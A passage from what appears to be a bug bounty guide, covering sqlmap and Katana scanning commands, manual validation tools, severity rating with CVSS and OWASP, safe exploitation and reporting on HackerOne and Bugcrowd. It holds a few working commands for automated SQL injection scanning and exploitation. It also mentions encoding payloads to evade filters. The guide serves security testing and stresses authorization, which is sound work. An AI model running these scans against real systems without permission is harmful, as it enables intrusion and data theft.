git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
```

**Basic Usage**:

To scan a URL for SQL Injection vulnerabilities:

```bash
python sqlmap.py -u "http://example.com/vulnerable.php?id=1" --batch
```

This command tests the specified URL and attempts to exploit any detected vulnerabilities.

### Alternative SQL Injection Tools

While sqlmap is a powerful tool, other options are available for detecting and exploiting SQL Injection vulnerabilities:

* **Havij**: A user-friendly automated SQL Injection tool with a graphical interface.
* **jSQL Injection**: A Java-based tool for automatic SQL database injection.
* **BBQSQL**: A blind SQL Injection exploitation tool written in Python.

Each tool offers unique features and interfaces, catering to different user preferences and testing scenarios.

### Integrating Katana with sqlmap

Katana is a high-speed web crawler developed by ProjectDiscovery, designed for automation pipelines and capable of both headless and non-headless crawling. It excels at discovering endpoints and parameters within web applications, making it a valuable tool for security assessments and web analysis.

By integrating Katana with sqlmap, you can enhance your security testing workflow:

1. **Discover Endpoints with Katana**:

   Use Katana to crawl a target website and identify URLs with parameters:

   ```bash
   katana -u https://example.com -f qurl -o urls_with_params.txt
   ```

   This command instructs Katana to crawl `https://example.com`, filter for URLs containing query parameters, and output the results to `urls_with_params.txt`.
2. **Scan Discovered URLs with sqlmap**:

   Feed the list of URLs into sqlmap for automated SQL Injection testing:

   ```bash
   sqlmap -m urls_with_params.txt --batch
   ```

   This command directs sqlmap to read URLs from `urls_with_params.txt` and test each for SQL Injection vulnerabilities.

This integration streamlines the process of identifying and exploiting SQL Injection vulnerabilities, combining comprehensive crawling with automated testing.

By understanding the various types of SQL Injection and utilizing tools like sqlmap and Katana, security professionals can effectively identify and mitigate these critical vulnerabilities, enhancing the overall security posture of


# Testing Phase

The **Testing** phase is a crucial step in the bug hunting process. Here, the bug hunter carefully examines and validates the vulnerabilities identified during the **Scanning** phase. Rather than relying solely on automated tools, the testing phase involves manual analysis and hands-on investigation, allowing the bug hunter to confirm the existence of vulnerabilities, understand their underlying causes, and gauge their severity accurately. This phase is essential to ensure that only legitimate and impactful vulnerabilities are reported, adding credibility and precision to the findings.

### Key Steps in the Testing Phase

1. **Manual Validation**:\
   Automated scanning tools can sometimes produce false positives, so manually validating each potential vulnerability is essential. The bug hunter revisits each issue to ensure it is indeed a security flaw rather than an artifact of the scanning tool.
   * For instance, if an automated tool detects an SQL Injection vulnerability, the hunter will attempt to inject malicious SQL queries manually to observe the behavior of the application. This approach confirms whether the vulnerability is exploitable in real-world scenarios.
2. **Severity Assessment**:\
   Not all vulnerabilities carry the same risk level. During testing, the bug hunter evaluates each confirmed vulnerability’s impact on the application and its users. Severity assessment involves understanding the potential harm a vulnerability could cause if exploited, helping to prioritize issues and focus on those with significant consequences.
   * For example, an XSS vulnerability that allows an attacker to steal user cookies might be rated as "High" severity, whereas a minor information leak may be rated "Low."
3. **Exploitation**:\
   This step involves safely demonstrating the exploitability of a vulnerability without causing damage to the application or its data. The goal is to illustrate the impact to the organization or project owners.
   * For example, if the bug hunter finds an IDOR (Insecure Direct Object Reference) vulnerability, they might demonstrate how one user could access another user's data by modifying request parameters.
4. **Documentation of Findings**:\
   Throughout the testing process, it’s essential to keep detailed records of all confirmed vulnerabilities. This documentation includes:
   * The type of vulnerability and how it was discovered
   * The specific URL or endpoint affected
   * The input data or payloads used to exploit it
   * Screenshots or video captures demonstrating the vulnerability in action
5. **Preparation for Reporting**:\
   After testing, the bug hunter prepares to report the vulnerabilities to the organization. The goal is to present clear, organized, and concise documentation that outlines the security issues, how they can be exploited, and potential remediation steps.

By thoroughly validating, assessing, and documenting each vulnerability, the Testing phase enhances the accuracy and reliability of the bug hunter’s findings, setting the foundation for a professional and constructive Reporting phase.


# Manual Validation

For manual validation, there are several specialized tools that bug hunters can use to confirm vulnerabilities and analyze their impact in more depth. Here’s a list of popular tools for validating specific types of vulnerabilities:

#### 1. **Burp Suite**

* **Purpose**: A comprehensive tool for web application security testing.
* **Use Case**: Intercepts and manipulates requests/responses, allowing testers to modify inputs, cookies, and headers to validate vulnerabilities like SQL Injection, XSS, IDOR, and CSRF.
* **Key Features**: Includes features like Repeater (to replay requests), Intruder (to automate customized attack payloads), and Scanner (for finding common vulnerabilities).
* **Free & Paid Versions**: The Community version offers basic features, while the Pro version includes advanced automation and scanning capabilities.
* **Website**: [PortSwigger](https://portswigger.net/)

#### 2. **OWASP ZAP (Zed Attack Proxy)**

* **Purpose**: An open-source alternative to Burp Suite.
* **Use Case**: Proxy-based tool that allows for interception, analysis, and manipulation of HTTP/HTTPS traffic.
* **Key Features**: Offers spidering, automated scanners, and allows for manual testing by intercepting and replaying requests.
* **Good For**: Validating XSS, SQL Injection, and other input-based vulnerabilities.
* **Website**: [OWASP ZAP](https://www.zaproxy.org/)

#### 3. **SQLmap**

* **Purpose**: Automates SQL Injection detection and exploitation.
* **Use Case**: Tests if SQL Injection vulnerabilities are exploitable and determines the potential impact.
* **Key Features**: Supports database fingerprinting, data extraction, and testing for SQL Injection on various databases like MySQL, PostgreSQL, and Oracle.
* **Good For**: Validating and exploiting SQL Injection vulnerabilities.
* **Website**: [sqlmap](https://github.com/sqlmapproject/sqlmap)

#### 4. **XSSer**

* **Purpose**: Specialized in finding and testing Cross-Site Scripting (XSS) vulnerabilities.
* **Use Case**: Automates the detection of reflected and stored XSS across web applications.
* **Key Features**: Provides options to customize payloads and test multiple XSS injection points.
* **Good For**: Validating XSS vulnerabilities across different injection points.
* **Website**: [XSSer](https://github.com/epsylon/xsser)

#### 5. **Postman**

* **Purpose**: An API development and testing tool.
* **Use Case**: Sending custom requests and parameters to test APIs and endpoints for security flaws like authentication bypasses, IDOR, and parameter tampering.
* **Good For**: Testing API vulnerabilities and validating endpoint security.
* **Website**: [Postman](https://www.postman.com/)

#### 6. **Nmap and Nmap Scripting Engine (NSE)**

* **Purpose**: Primarily used for network scanning, but the NSE scripts can test for web application vulnerabilities.
* **Use Case**: Can validate server misconfigurations, open ports, outdated versions, and test for SQL Injection, XSS, and other vulnerabilities through custom scripts.
* **Good For**: Validating vulnerabilities related to network exposure, outdated services, and common misconfigurations.
* **Website**: [Nmap](https://nmap.org/)

#### 7. **ffuf (Fuzz Faster U Fool)**

* **Purpose**: A fast web fuzzer for brute-forcing directories, parameters, and content discovery.
* **Use Case**: Tests for hidden endpoints, parameter discovery, and IDOR vulnerabilities by fuzzing parameters and URLs.
* **Good For**: Validating IDOR and hidden paths, and discovering parameters for testing.
* **Website**: [ffuf](https://github.com/ffuf/ffuf)

#### 8. **CyberChef**

* **Purpose**: A powerful tool for encoding, decoding, and transforming data.
* **Use Case**: Manually encodes/decodes payloads to bypass security filters and validate if the vulnerability can be exploited by obfuscating payloads.
* **Good For**: Encoding payloads to test XSS and SQL Injection evasion techniques.
* **Website**: [CyberChef](https://cyberchef.org/)


# Severity Assessment in Vulnerability Testing

In the **Testing Phase** of bug hunting, accurately assessing the severity of each confirmed vulnerability is crucial. This process involves evaluating the potential impact of a vulnerability on the application and its users, which aids in prioritizing remediation efforts and focusing on issues with significant consequences.

### Importance of Severity Assessment

Not all vulnerabilities pose the same level of risk. By determining the severity, bug hunters and organizations can:

* **Prioritize Remediation**: Address critical vulnerabilities promptly to mitigate substantial risks.
* **Allocate Resources Efficiently**: Focus efforts on vulnerabilities that could cause the most harm.
* **Communicate Impact Clearly**: Provide stakeholders with a clear understanding of potential risks.

### Factors Influencing Severity Levels

Several factors contribute to assessing the severity of a vulnerability:

1. **Exploitability**: How easily can the vulnerability be exploited?
2. **Impact on Confidentiality, Integrity, and Availability (CIA Triad)**:
   * **Confidentiality**: Could sensitive information be disclosed?
   * **Integrity**: Can data be altered or corrupted?
   * **Availability**: Might the system become unavailable or disrupted?
3. **Affected Systems**: Which systems or components are impacted?
4. **User Interaction**: Does exploitation require user action?
5. **Authentication Requirements**: Is authentication needed to exploit the vulnerability?

### Common Severity Rating Systems

Standardized frameworks help in assigning severity levels:

#### 1. Common Vulnerability Scoring System (CVSS)

CVSS provides a numerical score (0.0 to 10.0) based on various metrics, translating into qualitative ratings:

* **None**: 0.0
* **Low**: 0.1–3.9
* **Medium**: 4.0–6.9
* **High**: 7.0–8.9
* **Critical**: 9.0–10.0

For detailed information, refer to the [NVD Vulnerability Metrics](https://nvd.nist.gov/vuln-metrics/cvss).

### Common Vulnerability Scoring System Calculator <a href="#cvssheadertext" id="cvssheadertext"></a>

<figure><img src="https://4139606766-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F2Clpj5NNgy3m0M7WnVOl%2Fuploads%2FBHk9mtXor0HmxljIWjRr%2Fseverity1.png?alt=media&amp;token=07b43496-7935-4349-b4a4-d6c28c646514" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4139606766-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F2Clpj5NNgy3m0M7WnVOl%2Fuploads%2F1kebaHhSPFoAsFDL1r5r%2Fseverity2.png?alt=media&amp;token=4b105926-60a4-46da-a329-27dcfd3a11db" alt=""><figcaption></figcaption></figure>

Use the link below to access the CVSS v3 Calculator\
<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator>

#### 2. OWASP Risk Rating Methodology

OWASP assesses risk based on **Likelihood** and **Impact**, each evaluated through specific factors:

* **Likelihood Factors**:
  * **Threat Agent Factors**: Skill level, motive, opportunity, size.
  * **Vulnerability Factors**: Ease of discovery, ease of exploit, awareness, intrusion detection.
* **Impact Factors**:
  * **Technical Impact**: Loss of confidentiality, integrity, availability, accountability.
  * **Business Impact**: Financial damage, reputation damage, non-compliance, privacy violation.

For more details, see the [OWASP Risk Rating Methodology](https://owasp.org/www-community/OWASP_Risk_Rating_Methodology).

### Examples of Severity Assessment

* **High Severity**: An XSS vulnerability that allows an attacker to steal user cookies, leading to session hijacking.
* **Medium Severity**: An SQL Injection vulnerability that requires authentication and can access non-sensitive data.
* **Low Severity**: An information disclosure vulnerability revealing non-sensitive system details.

### Best Practices for Severity Assessment

* **Use Standardized Frameworks**: Apply CVSS or OWASP methodologies for consistency.
* **Consider Business Context**: Evaluate how the vulnerability affects the specific organization.
* **Document Rationale**: Provide clear reasoning for assigned severity levels.
* **Stay Updated**: Keep abreast of emerging threats and adjust assessments accordingly.

By systematically assessing the severity of vulnerabilities, bug hunters can effectively prioritize issues, ensuring that the most critical threats are addressed promptly to maintain the security and integrity of applications.


# Exploitation Phase

In the **Exploitation Phase** of bug hunting, the objective is to safely demonstrate the exploitability of identified vulnerabilities without causing harm to the application or its data. This phase is crucial for illustrating the potential impact to the organization or project owners, thereby emphasizing the need for remediation.

### Key Objectives

1. **Demonstrate Exploitability**: Show that the vulnerability can be exploited under realistic conditions.
2. **Assess Potential Impact**: Evaluate the consequences of exploitation on the application's confidentiality, integrity, and availability.
3. **Maintain Safety and Integrity**: Ensure that testing does not disrupt normal operations or compromise data integrity.

### Steps in the Exploitation Phase

1. **Controlled Environment Testing**: Whenever possible, perform exploitation in a controlled environment, such as a staging server or a local instance, to prevent unintended consequences.
2. **Develop Proof of Concept (PoC)**: Create a PoC that demonstrates the vulnerability's exploitability. This may include crafting specific payloads, scripts, or sequences of actions that trigger the vulnerability.
   * *Example*: For an Insecure Direct Object Reference (IDOR) vulnerability, modify request parameters to access another user's data, thereby demonstrating unauthorized access.
3. **Document Findings**: Record detailed information about the exploitation process, including:
   * Steps taken to exploit the vulnerability.
   * Screenshots or videos capturing the exploitation.
   * Any error messages or system responses observed.
4. **Assess Impact**: Analyze the potential damage that could result from successful exploitation, such as data breaches, privilege escalation, or service disruption.
5. **Prepare for Reporting**: Compile all findings into a comprehensive report that clearly communicates the vulnerability, exploitation method, and potential impact to stakeholders.

### Best Practices

* **Non-Destructive Testing**: Avoid actions that could alter or delete data, disrupt services, or negatively impact users.
* **Obtain Authorization**: Ensure that you have explicit permission to perform exploitation, especially on production systems.
* **Use Ethical Exploitation Tools**: Utilize tools designed for safe exploitation, such as:
  * **Burp Suite**: For intercepting and modifying web traffic to test for vulnerabilities like XSS, SQL Injection, and IDOR.
  * **OWASP ZAP**: An open-source tool for finding security vulnerabilities in web applications.
  * **sqlmap**: An automated tool for detecting and exploiting SQL Injection flaws.
  * **Dalfox**: A fast tool for finding and exploiting XSS vulnerabilities.
* **Simulate Real-World Scenarios**: Craft exploitation scenarios that mirror potential real-world attacks to provide a realistic assessment of risk.
* **Maintain Confidentiality**: Handle all data accessed during exploitation responsibly and do not disclose sensitive information.

By adhering to these practices, bug hunters can effectively demonstrate the exploitability of vulnerabilities, providing valuable insights to organizations and aiding in the development of robust security measures.


# Documentation of Findings

In the **Testing Phase** of bug hunting, meticulous documentation of all confirmed vulnerabilities is crucial. Comprehensive records not only facilitate effective communication with stakeholders but also aid in the remediation process. Key elements to document include:

* **Type of Vulnerability**: Clearly specify the nature of the vulnerability (e.g., SQL Injection, Cross-Site Scripting).
* **Discovery Method**: Detail the techniques or tools used to identify the vulnerability.
* **Affected URL or Endpoint**: Provide the exact location within the application where the vulnerability exists.
* **Exploitation Input Data or Payloads**: List the specific data or payloads used to exploit the vulnerability.
* **Visual Evidence**: Include screenshots or video captures that demonstrate the vulnerability in action.

### Tools for Effective Documentation

Utilizing specialized tools can enhance the accuracy and clarity of your documentation. Below are recommended tools and their applications:

#### 1. **Burp Suite**

* **Purpose**: A comprehensive web vulnerability scanner and proxy tool.
* **Documentation Features**:
  * **Request and Response Logging**: Captures detailed HTTP requests and responses, which can be exported for reporting.
  * **Annotations**: Allows adding notes directly to intercepted traffic for context.
* **Usage**:
  * Intercept and analyze traffic between your browser and the target application.
  * Use the "Save Item" feature to export specific requests and responses.
* **Website**: PortSwigger

#### 2. **OWASP ZAP (Zed Attack Proxy)**

* **Purpose**: An open-source web application security scanner.
* **Documentation Features**:
  * **Session Management**: Records all interactions, which can be saved and reviewed.
  * **Report Generation**: Generates comprehensive reports in various formats.
* **Usage**:
  * Use the "History" tab to review and export specific requests and responses.
  * Generate reports via the "Report" menu for a summary of findings.
* **Website**: [OWASP ZAP](https://www.zaproxy.org/)

#### 3. **Postman**

* **Purpose**: An API development and testing environment.
* **Documentation Features**:
  * **Request Collections**: Organizes API requests into collections for easy reference.
  * **Export Options**: Exports collections and responses in various formats.
* **Usage**:
  * Create and save requests to the target API endpoints.
  * Use the "Save Response" feature to document responses.
* **Website**: [Postman](https://www.postman.com/)

#### 4. **Greenshot**

* **Purpose**: A lightweight screenshot tool.
* **Documentation Features**:
  * **Annotation Tools**: Provides options to highlight, annotate, and obfuscate parts of the screenshot.
  * **Export Options**: Saves images in various formats and integrates with other applications.
* **Usage**:
  * Capture screenshots of the application during testing.
  * Annotate to highlight specific areas of interest.
* **Website**: [Greenshot](https://getgreenshot.org/)

#### 5. **OBS Studio**

* **Purpose**: Open-source software for video recording and live streaming.
* **Documentation Features**:
  * **Screen Recording**: Records desktop activity, useful for demonstrating complex exploitation steps.
  * **Customizable Scenes**: Allows setting up different recording layouts.
* **Usage**:
  * Set up a recording session to capture the exploitation process.
  * Save recordings in standard video formats for inclusion in reports.
* **Website**: [OBS Studio](https://obsproject.com/)

#### 6. **Joplin**

* **Purpose**: An open-source note-taking and to-do application.
* **Documentation Features**:
  * **Markdown Support**: Enables structured and formatted note-taking.
  * **Notebook Organization**: Organizes notes into notebooks for better management.
* **Usage**:
  * Document each vulnerability with detailed notes.
  * Attach relevant files or images to each note.
* **Website**: [Joplin](https://joplinapp.org/)

### Best Practices for Documentation

* **Consistency**: Use standardized templates to ensure uniformity across all reports.
* **Clarity**: Write in clear, concise language, avoiding technical jargon when possible.
* **Detail**: Provide enough information for the reader to understand and reproduce the issue.
* **Confidentiality**: Ensure that sensitive information is handled appropriately and shared only with authorized parties.

By leveraging these tools and adhering to best practices, you can create thorough and professional documentation that effectively communicates your findings to stakeholders, facilitating prompt and effective remediation.


# Reporting Phase

The **Reporting Phase** is a critical stage in the bug hunting process where the researcher communicates confirmed vulnerabilities to the organization. This phase involves detailing the nature of the vulnerability, the steps to reproduce it, its potential impact, and recommendations for remediation. Effective reporting ensures that organizations can understand and address security issues promptly, thereby enhancing the overall security posture of their applications.

### Key Components of an Effective Bug Report

1. **Summary**: A concise overview of the vulnerability, highlighting its type and potential impact.
2. **Description**: A detailed explanation of the vulnerability, including the affected components and the conditions under which it occurs.
3. **Steps to Reproduce**: A clear, step-by-step guide to replicating the issue, enabling the organization's security team to verify the vulnerability.
4. **Proof of Concept (PoC)**: Code snippets, screenshots, or videos demonstrating the exploitation of the vulnerability.
5. **Impact Assessment**: An analysis of the potential risks associated with the vulnerability, such as data breaches or system compromise.
6. **Recommendations**: Suggestions for mitigating or fixing the vulnerability to prevent exploitation.

### Reporting Vulnerabilities on Bug Bounty Platforms

Bug bounty platforms like HackerOne and Bugcrowd provide structured environments for reporting vulnerabilities. These platforms facilitate communication between researchers and organizations, ensuring that vulnerabilities are addressed efficiently.

#### Reporting on HackerOne

To submit a vulnerability report on HackerOne:

1. **Access the Program's Security Page**: Navigate to the specific program's page on HackerOne.
2. **Click "Submit Report"**: Initiate the reporting process by clicking the "Submit Report" button.
3. **Complete the Submission Form**: Provide detailed information about the vulnerability, including:
   * **Asset Type**: Specify the type of asset affected (e.g., web application, mobile app).
   * **Weakness**: Identify the type of vulnerability (e.g., SQL Injection, Cross-Site Scripting).
   * **Severity**: Optionally, suggest a severity level based on the potential impact.
   * **Proof of Concept**: Detail the steps to reproduce the vulnerability and include any supporting evidence.
4. **Attach Supporting Materials**: Upload screenshots, videos, or other relevant files to aid in understanding the issue.
5. **Submit the Report**: Review all information for accuracy and completeness before submitting.

For comprehensive guidance, refer to HackerOne's [Submitting Reports](https://docs.hackerone.com/en/articles/8473994-submitting-reports) documentation.

#### Reporting on Bugcrowd

To report a vulnerability on Bugcrowd:

1. **Log into Your Account**: Access your Bugcrowd researcher account.
2. **Select the Target Program**: Choose the appropriate program from your dashboard.
3. **Click "Report Bug"**: Begin the reporting process by clicking the "Report Bug" button.
4. **Fill Out the Submission Form**: Provide detailed information, including:
   * **Summary**: A brief overview of the vulnerability.
   * **Target**: Specify the affected component or endpoint.
   * **Technical Severity**: Classify the vulnerability based on Bugcrowd's Vulnerability Rating Taxonomy (VRT).
   * **Description and Impact**: Explain the vulnerability in detail and assess its potential impact.
   * **Proof of Concept**: Include steps to reproduce the issue and any supporting evidence.
5. **Attach Supporting Files**: Upload any relevant files, such as logs or screenshots, to support your findings.
6. **Submit the Report**: Review all details to ensure accuracy before submission.

For detailed instructions, consult Bugcrowd's [Reporting a Bug](https://docs.bugcrowd.com/researchers/reporting-managing-submissions/reporting-a-bug/) documentation.

### Best Practices for Effective Reporting

* **Clarity and Precision**: Use clear and concise language to describe the vulnerability and its impact.
* **Reproducibility**: Ensure that the steps to reproduce are detailed enough for the organization's security team to follow.
* **Professionalism**: Maintain a professional tone and adhere to the platform's code of conduct.
* **Confidentiality**: Do not disclose vulnerability details publicly until the organization has addressed the issue and given permission for disclosure.

By adhering to these best practices and utilizing the structured reporting mechanisms provided by platforms like HackerOne and Bugcrowd, researchers can effectively communicate vulnerabilities, facilitating prompt remediation and contributing to the overall security of applications and systems.


